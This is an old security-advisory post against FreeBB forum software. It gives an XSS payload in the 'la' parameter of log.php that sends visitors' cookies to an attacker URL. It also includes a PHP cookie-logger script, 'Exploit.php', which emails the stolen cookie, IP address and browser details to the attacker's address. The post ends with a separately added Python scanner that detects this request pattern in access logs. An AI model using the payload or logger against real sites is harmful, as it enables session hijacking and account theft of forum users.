SECURITYVULNS:DOC:12783
May 25, 2006 - 12:00 a.m.

View Topic Flood phpBB, MercuryBoard, Vbulletin, Ipb


       /      \
    \  \  ,,  /  /
     '-.`\()/`.-'
    .--_'(  )'_--.
   / /` /`""`\ `\ \           * SpiderZ ForumZ Security *
    |  |  ><  |  |
    \  \      /  /
        '.__.'       

• XSS FreeBB (All Versions)
• Author: SpiderZ
• Site: http://www.spiderz.altervista.org
• Site2: https://www.spiderz.netsons.org


XSS FreeBB
Official FreeBB site: http://www.free-bb.com/fr/

Url : www.sitoweb.com/forum/log.php?log=avatar&sid=1&a=ma

XSS

nrw&la=">><script>document.location.replace('http://WWW.SITOWEB/FILE.php?c='+document.cookie);</script>

Url + xss : www.sitoweb.com/forum/log.php?log=avatar&sid=1&a=ma?nrw&la=">><script>document.location.replace('http://WWW.SITOWEB.COM/FILE.php?c='+document.cookie);</script>

Log cookie ( Exploit.php )

<?php
// Details of the browser that followed the injected redirect
$ip = $_SERVER['REMOTE_ADDR'];
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$accept = $_SERVER['HTTP_ACCEPT_LANGUAGE'];
// Cookie string appended to the "c" parameter by the injected script
$cookie = $_GET['c'];
$myemail = "LA TUA E-MAIL";
$today = date("l, F j, Y, g:i a");
$subject = "Xss fre-bb";
// $base is never assigned in this script, so the "Url:" line is sent empty
$message = "Xss free-bb
Ip: $ip
Cookie: $cookie
Browser: $userAgent
Lingua: $accept
Url: $base
Giorno & Ora : $today \n
";
$from = "From: $myemail\r\n";
mail($myemail, $subject, $message, $from);
?>


Edit: $myemail = "LA TUA E-MAIL";

e.g.: [email protected]
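
A defender-side check for the request pattern shown above, as an added example that is not part of the original advisory: it scans web-server access-log lines for requests to log.php whose la parameter decodes to quote or angle-bracket characters, including double-encoded ones. The log lines are constructed samples, the function names are hypothetical, and the premise that legitimate la values never contain those characters is an assumption the advisory does not state.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed access-log lines (addresses, paths and payloads are samples).
SAMPLE_LOG = [
    '203.0.113.5 - - [25/May/2006:10:00:01 +0000] "GET /forum/log.php?log=avatar&sid=1&la=it HTTP/1.1" 200 512',
    '203.0.113.9 - - [25/May/2006:10:00:07 +0000] "GET /forum/log.php?log=avatar&sid=1&la=%22%3E%3Cscript%3Ex%3C/script%3E HTTP/1.1" 200 640',
    '203.0.113.9 - - [25/May/2006:10:00:09 +0000] "GET /forum/log.php?log=avatar&la=%2522%253E%253Cscript%253E HTTP/1.1" 200 640',
    '203.0.113.7 - - [25/May/2006:10:00:12 +0000] "GET /forum/index.php?la=%3Cb%3E HTTP/1.1" 200 300',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate "la" value never needs quotes or angle brackets.
BREAKOUT_RE = re.compile(r'["\'<>]')


def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding so double-encoded markup is still seen."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_la_requests(lines, script="log.php", param="la"):
    """Return (client_ip, decoded_value) for requests that look like the injection."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        if not target.path.endswith("/" + script):
            continue
        # Split on "&" by hand: the raw value is decoded here, possibly more than once.
        for pair in target.query.split("&"):
            name, _, raw = pair.partition("=")
            value = fully_decode(raw)
            if unquote_plus(name) == param and BREAKOUT_RE.search(value):
                hits.append((line.split()[0], value))
    return hits


if __name__ == "__main__":
    for ip, value in suspicious_la_requests(SAMPLE_LOG):
        print(ip, repr(value))
```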